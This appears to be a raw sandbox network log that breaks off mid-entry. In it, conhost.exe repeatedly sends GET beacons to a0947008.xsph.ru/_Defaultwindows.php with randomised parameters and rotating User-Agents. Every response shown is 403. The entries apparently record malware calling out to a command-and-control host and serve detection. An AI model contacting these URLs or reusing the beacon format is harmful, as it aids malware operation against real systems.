Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&A1lpnRbx2=D7zq4mxcPExu7bhBK9r3o2wTG5&YpRlKgushR2MTpBDVcQ4KImHbG=JKKfk9yZw7cmOMt9tRxXOmzb00BnQDK HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:43 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?5KSwfM1XMNin8a1tisW=mdlGy9qsXR&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&5KSwfM1XMNin8a1tisW=mdlGy9qsXR HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:28:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&swfl=XC83nrKa89&n7jdLToRA5ohI9l7GLBmyMDTj1k2S=9PPoFwsW2ZHNlVsez4CtEO7XGb4P3&tw9F6ZRe3yP=SmekkrkEBp0i0uR2ho2ccipU HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&cWOZXYTZLghgtV=6CSfVGRuZA&2MqOXLbuKUKPFuRcSR=yVwepayvBSL HTTP/1.1
Accept: */*
Content-Type: text/html
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:39 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&L8aIH7nBB5QvwHJRi58DdXUZpD1dM=SGFeF5iLipUm9QaadYAtl0ypb&nAdDFJzOmKqRCNtXWSs0XE8Okc=cLcSZCQRhrfjLxv&QuLWwAOdf7lajCPdnrWDK=QOv6Lp1thDlaseZGqc68wbb0sfcB HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Edg/95.0.1020.53
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?CAARenpr=X2SmldoAz8aLUhEGmBiy&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&CAARenpr=X2SmldoAz8aLUhEGmBiy HTTP/1.1
Accept: */*
Content-Type: text/csv
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:29:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&Pqm0MRr8hqb=MKVYyjDtEXmVD43kJ&EfTf=hM HTTP/1.1
Accept: */*
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow HTTP/1.1
Accept: */*
Content-Type: text/css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&NFGawaH5OaHotuT=0gd0BHAkOVZ3IvBpF9HAQ&1qPIYEb9IZ13YAxvaFFfLb=Ow HTTP/1.1
Accept: */*
Content-Type: text/css
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0
Host: a0947008.xsph.ru

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:24 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6

conhost.exe

Remote address:

141.8.192.103:80

Request

GET /_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6 HTTP/1.1
Accept: */*
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
Host: a0947008.xsph.ru
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Server: openresty
Date: Sun, 05 May 2024 01:30:35 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
GET

http://a0947008.xsph.ru/_Defaultwindows.php?ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6&7b78d307e8d2e9bbe44ee1c5a866b18b=485eeeb4ce1dd75a143e72e567907b6e&cab7241f3810de841f1783f59fd1d000=AZ4YDNxYjZ0ETO4QmM2ATZ4UGOlFGMiRjMidDN3AjMyUTY5UGMiJWM&ZQ8gXH0vD5Ou3BMnbD=ZZqraPNM7MJRUfknpg3pE&pM5OmYSB5KEnYJtjiQJ=2j4o4OTXgHhXjztdvLmy35Q8MqHa3&8mgI=GSRTXF5eynqEjaQxWoVB7S6

conhost.exe

Remote address:

141.8.192.103:80

Request

